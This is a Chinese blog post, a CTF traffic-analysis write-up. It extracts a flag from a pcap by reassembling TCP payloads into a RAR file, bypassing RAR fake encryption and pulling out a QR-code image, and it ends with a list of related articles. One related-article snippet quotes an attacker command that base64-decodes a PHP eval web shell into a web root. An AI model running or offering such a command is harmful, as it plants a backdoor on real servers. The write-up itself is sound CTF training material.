流量分析题目(流量检索,数据提取,数据重组,伪加密,图片提取)

最新推荐文章于 2025-06-30 17:11:19 发布
原创 最新推荐文章于 2025-06-30 17:11:19 发布 · 6k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了一次从网络流量中提取隐藏数据的过程,包括使用科来和Wireshark进行流量检索,数据提取与重组,破解伪加密,以及从源数据中提取图片和二维码获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

流量检索:

将数据包加入科来进行分析,当然wireshark也可以,但是科来的数据可视化做的比较好。

找到了一个比较大的数据包,打开看看。。。

数据提取:

搜索关键字flag。。。果然在这里,使用wireshark进行数据的提取,看大小应该就是这几个了

数据重组:

挨个保存,最好编个号,以免重组的时候乱了顺序

一共保存了五个数据包,以上所选是每个包的包头,需要去掉

伪加密:

去掉包头后,dos下copy命令进行数据包重组,通过查看第一个数据包的十六进制码,可以知道这是一个rar文件,所以重组为rar文件,但是打开的时候,需要输入密码,首先想到的--伪加密

将74 84 改为 74 80,直接解压。查看十六进制源数据,发现是exe可执行程序。将扩展名改为exe。。。

好恶心。。。

图片提取:

再次打开源数据,发现最下方有一个png图片,提取出来,是一个二维码,扫码,得到flag

以上文件1,2,3,4,5是tcp流的源数据

11,22,33,44,55是去掉包头的数据

flag.rar是重组后的数据

flag0.rar是破除伪加密的压缩包

2025最新华为OD机试真题目录A+B+C+D+E卷(持续收录中)-Java版
**My Coding Family**
02-12 2886
🔔本文收录于「最新最全华为OD机试真题(Java版)」专栏,手把手带你零基础教学华为OD机试。本题集提供最优题解思路,解题步骤,代码解析,复杂度分析及最优题解源码等,支持多语言题解,助你轻松拿捏OD机考,一举上岸!安利大家关注&&收藏&&订阅!题库正在疯狂收录中,up!up!up!! 🚫提醒:拒绝一切代考/替考,违法必究!专栏所写题库均搜集于互联网,经过精心筛选和整理,结合数位十多年大厂实战经验资深大佬经验所撰,欢迎订阅。    💗订阅福利:一次订阅,可永久免费阅读,提供在线答疑解惑,后续题库更新皆可
计算机网络复习-典型题目答案
qq_41635653的博客
06-16 1万+
第1章 概述 一.单选题(共8题) 1 关于网络分层结构,下面的叙述正确的是_________。 A、 某一层可以使用其上层提供的服务而不需知道服务是如何实现的(应该是下层) B、 当某一层发生变化时,只要接口关系不变,其余各层均不受影响 C、 由于结构彼此分离,实现和维护更加困难 D、 层次划分越多,灵活性越好,提高了协议的效率 我的答案:B 2 在下列交换方式中,_________的实时性最好。 A、 电路交换 B、 数据报分组交换 ...
流量分析—ctf
m0_53067332的博客
01-10 8857
题目介绍 该题为流量分析,当黑客入侵我们的网络是,我们可以需要通过一系列分析操作来进行抓捕与追踪,本题目难度中等偏下,不是很有难度,但题目类型较为全面,适合入手当做练习。 一、题目背景 某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题 二、关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某
CTF流量分析
Kiber
04-19 753
思路:http.request.method =="POST" && http contains "php",追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php')找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件。
CTF竞赛——流量分析
最新发布
mxy_yl的博客
06-30 252
①统计HTTP请求,看看是否有可疑文件,如果有例如php包,过滤HTTP找到php的发送包,然后追踪tcp流。②导出HTTP对象,看看是否能输出什么信息,或者有什么数字和字符是能串成一串或者对大小排序。③搜索得到的包里面的信息加入xinxi.php,可以先过滤http,再搜索xinxi字符串。查看协议分级,占比最多的就是HTTP协议,而且观察HTTP包似乎有test.txt文件。一直改变左上角的数字,追踪TCP流,当追踪到第20个时,查看到信息RSA加密密钥。3.2攻防世界:心仪的公司。
通过Wireshark进行QQ流量分析获取图片(保姆教学)
qq_61793472的博客
09-30 1571
特别声明:此教程仅用于学习。 工具: 手机、电脑、Wireshark、WinHex。 首先手机与电脑连接同一局域网,并记手机IP 然后打开Wireshark,双击WLAN 在应用显示过滤器输入 ip.scr == 手机IP ,然后点→ 开始运行。此时手机QQ向电脑发送图片,Wireshark数据列表便会有数据显示 右击HTTP行,在追踪流 点TCP流 将下面两个框改为 (kB) 和 原始数据(RAW) 另存为.jpg结尾命名的文件 将文件拖入WinHex,
CTF流量分析
m0_37442062的博客
05-03 4313
1.flag被盗了,pcap(gnnl) 尝试http过滤,get或者post追踪tcp流即可,这里是post, flag{This_is_a_f10g} 2.这么多数据包找找吧,先找到getshell的流pcap(vn78) 过滤tcp TCP流通常是命令行操作 Q0NURntkb195b3VfbGlrZV9zbmlmZmVyfQ== 解码:CCTF{do_you_like_sniffer} 3.有一天皓宝宝没了流量只好手机来共享,顺便又从手机发了点小秘密到电脑,你能找到它吗?
流量分析----CTF题
qq_38390532的博客
05-02 1万+
某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题
架构案例分析
zylg
10-11 1803
架构师案例分析 <1> 嵌入式操作系统 3 <2> 系统可靠性 3 <3>应用系统数据架构 6 <4>数据库 7 <5>开发方法 9 <6>软件架构设计 11 <7>构件 13 <8>UML 15 <9>面向服务架构SOA 17 <10> 嵌入式 19 <十一> 数据库 22 <十二> 系统建模 24 <十三> 结构化分析 27 <十四>结构
案例分析答案
zylg
10-15 1279
文章目录UML质量属性WebWeb大量并发访问的技术手段:微服务架构嵌入式设计模式 UML 用例图三个基本元素:参与者,用例和通信关联 参与者是指存在于系统系统外部并与系统进行交互的任何事物,既可以是使用系统的用户,也可以是其他外部系统和设备等外部实体。 用例表示系统所提供的服务。 通信关联表示的用例与参与者或者用例与用例之间的关系 构建用例模型的四个阶段: 标识参与者,合并需求获得用例,细化用例描述,调整用例模型 质量属性 敏感点:为实现某种质量属性,一个或多个构件所具有的特性。 权衡点:影响多个质量属性
如何将kali数据包中的flag文件分离
03-11
还有可能需要考虑内存取证,比如引用中的volatility工具,但用户的问题是关于数据包的,所以可能重点在流量分析而不是内存。不过如果数据包处理过程中有内存转储,可能需要结合两者。 最后,用户可能需要一些实际...
CTF——流量分析题型整理总结
热门推荐
小锤队长的博客
12-19 5万+
我见过的流量分析类型的题目总结: 一,ping 报文信息 (icmp协议) 二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载) 三,sql注入攻击 四,访问特定的加密解密网站(md5,base64) 五,后台扫描+弱密码爆破+菜刀 六,usb流量分析 七,WiFi无线密码破解 八,根据一组流量包了解黑客的具体行为 例题: 一,ping 报文信息 (icm...
两道CTF流量分析题分享
seek_2022的博客
03-10 3027
本文分享了两道CTF流量分析题,分析的过程充满着许多乐趣,希望本文分享的两道题的分析对大家学习相关技能有帮助。
ctf流量分析练习二
gclome的博客
09-06 3912
上次的流量分析做的我一个脑袋两个大!但是不能放弃啊,再找一些题来练练手 0x01 经典题型 CTF题型主要分为流量包修复、WEB流量包分析、USB流量包分析和其他流量包分析。 01 流量包修复 比赛过程中有可能会出现通过wireshark打开题目给的流量包后提示包异常的情况,如下图所示: 解题思路: 通过在线pacp包修复工具进行修复: http://f00l.de/hacking/pcapfix.php 修复之后,再次打开 用tcp contains “flag”,找到了下面这句话: 于是乎,flag就在
CTF——MISC习题讲解(流量分析winshark系列)
tlovejr的博客
03-14 7375
CTF——MISC习题讲解(流量分析winshark系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下不一样的,给大家来一期流量分析专题,在这个专题中,所有的题目链接都整理好了,就不给大家一一展示了,大家可以直接统一下载即可。 一、基础篇-----flag明文 首先打开文件发现以下界面 在这个界面直接ctrl+f,直接搜索flag关键字 然后直接查找就可以看到flag 二、基础篇----flag编码 1、bianma1 这个题直接查找flag的话是没有的,所以我们把flag直接编
CTF 流量包相关-流量分析(1)
qq_56815564的博客
04-28 1万+
前面的flag不论是直接给你明文,还是有一定的编码,都是比较简单的,像这些十成甚至九成都会是签到题,所以了解一下知道有这种情况就好,重点不再这边另外这里还是给出一下风佬的脚本吧,虽然我感觉用到的几率应该不会很大,如果要用的话,那个破空查flag的工具应该会比较好用,下载的话,风佬的git里面应该有,这里就不给了。
风二西CTF流量题大集合-刷题笔记|NSSCTF流量题(1)
zerorzeror的博客
01-22 2078
imgulfflagiswelcometfjnu 修正 imgulfflagiswelcometofjnu。
渗透测试CTF-流量分析
保持微笑的博客
11-03 4444
渗透测试CTF-流量分析
关于流量分析题目的解析
TJHder的博客
03-19 4259
展示一部份吧,我们将它先利用hex转化为ascii,然后这个是一个埃及文,意思是说要进行一个zip文件格式的保存然后利用notepad++进行一个ascii的转换即可得到一个docx(word文档),里面就有flag!我们将这个字节流保存下来,然后用工具发现它是一个jpg格式的图,于是以jpg的格式进行保存下来于是我们就可以看到密码是多少,然后我们将这个密码带入进去就可以得到我们需要的flag。先在kali里面用弱口令去进行爆破,然后将密码带入并生成一个1.pcap的文件打开后,查找http协议的即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值